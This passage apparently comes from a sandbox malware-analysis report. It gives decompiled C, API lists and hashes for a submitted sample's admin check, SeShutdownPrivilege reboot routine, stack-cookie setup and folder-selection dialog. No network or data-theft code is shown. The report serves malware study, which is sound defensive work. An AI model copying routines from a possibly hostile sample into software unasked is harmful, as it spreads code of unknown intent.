                                                                                                                                                                                                                                            					return E00A46CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A417EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0xa48128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa48128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A418DD), ref: 00A4181A
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A4182C
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: AllocateAndInitializeSid.ADVAPI32(00A418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A418DD), ref: 00A41855
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: FreeSid.ADVAPI32(?,?,?,?,00A418DD), ref: 00A41883
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A418DD), ref: 00A4188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A418EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A418F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A4190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A41918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A4192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A41944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A41964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00A4197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00A4199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A419A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A419AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: a45435708c93c61d6be9f2f648a7a919dfca7bafb87563d94350ecd7d7cae439
                                                                                                                                                                                                                                            • Instruction ID: f06f9864223443bec2e1784e93c1d77a21b78208179178e3949cb9007e3dcfe3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45435708c93c61d6be9f2f648a7a919dfca7bafb87563d94350ecd7d7cae439
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74313B7DA00209ABDB20DFE5EC88AAFBBB8FBD5340B100429E545E2151E7329946CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00A41F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0xa49a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E00A444B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00A46CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E00A444B9(0, 0x522, 0xa41140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00A41EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















APIs
• GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A41EFB
• OpenProcessToken.ADVAPI32(00000000), ref: 00A41F02
• ExitWindowsEx.USER32(00000002,00000000), ref: 00A41FD3
Strings
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: Process$CurrentExitOpenTokenWindows
• String ID: SeShutdownPrivilege
• API String ID: 2795981589-3733053543
• Opcode ID: 2dd815afe7811a4cd7f3d9026e1a9a5f6cc53ec750e62908cf877d0cef950267
• Instruction ID: ff8fe2553119d182c79606ff01d9b788503107e7cf3299140aaa71e28cec08a2
• Opcode Fuzzy Hash: 2dd815afe7811a4cd7f3d9026e1a9a5f6cc53ec750e62908cf877d0cef950267
• Instruction Fuzzy Hash: 8021D67DB402056BDB209BE59C4AFBF76B8EBC6B50F20051AFA02D6181D77688879261
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A47155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0xa48004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa48004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0xa48008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A47182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A47191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A4719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A471A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00A471B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 60df8fa0295388a449c5a16faab1b4140bdb1af21541a85ec44f175e3e63eea1
                                                                                                                                                                                                                                            • Instruction ID: 57069cc6e8d3f4e309482a7e33f542f664641190e6cea35ad75969819e7eff36
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60df8fa0295388a449c5a16faab1b4140bdb1af21541a85ec44f175e3e63eea1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF114C7DD11208DFCB10DFF8EA48A9EB7F4EF9A310F614A55D806E7210EB359A058B41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A46CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a46cf7
                                                                                                                                                                                                                                            0x00a46d00
                                                                                                                                                                                                                                            0x00a46d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A46E26,00A41000), ref: 00A46CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A46E26,?,00A46E26,00A41000), ref: 00A46D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00A46E26,00A41000), ref: 00A46D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A46E26,00A41000), ref: 00A46D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 8727498b77b3d2ebcecf652579a946cdc52304ed27fbb009fd46fc69e58f8931
                                                                                                                                                                                                                                            • Instruction ID: 89ba821ebabef6af494612e76d398dc86de0989d5337bb602e117b98629af98d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8727498b77b3d2ebcecf652579a946cdc52304ed27fbb009fd46fc69e58f8931
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BD0C93E080108BBEB006BE9EC0CA593F28EBDA212F444104F31982020CA334452CB62
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00A43210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E00A443D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0xa49a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa491e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E00A444B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0xa491e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0xa491e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0xa491e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0xa491e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0xa491e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E00A4658A(0xa491e4, 0x104, 0xa41140);
                                                                                                                                                                                                                                            								_t27 = E00A458C8(0xa491e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0xa491e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa491e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E00A4597D(0xa491e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa491e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa491e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t32 = E00A444B9(_t64, 0x54a, 0xa491e4, 0, 0x20, 4);
                                                                                                                                                                                                                                            							__eflags = _t32 - 6;
                                                                                                                                                                                                                                            							if(_t32 != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t33 = CreateDirectoryA(0xa491e4, 0);
                                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0xa491e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags =  *0xa491e4 - 0x5c;
                                                                                                                                                                                                                                            						if( *0xa491e4 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                            						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					__eflags = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0xa49124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0xa49a3c, 0x3e8, 0xa48598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00A44224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa487a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E00A444B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x00a4324c
                                                                                                                                                                                                                                            0x00a4324c
                                                                                                                                                                                                                                            0x00a4324f
                                                                                                                                                                                                                                            0x00a432c8
                                                                                                                                                                                                                                            0x00a432ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a432ce
                                                                                                                                                                                                                                            0x00a43251
                                                                                                                                                                                                                                            0x00a43256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43271
                                                                                                                                                                                                                                            0x00a43277
                                                                                                                                                                                                                                            0x00a43279
                                                                                                                                                                                                                                            0x00a43298
                                                                                                                                                                                                                                            0x00a4329d
                                                                                                                                                                                                                                            0x00a4329f
                                                                                                                                                                                                                                            0x00000000
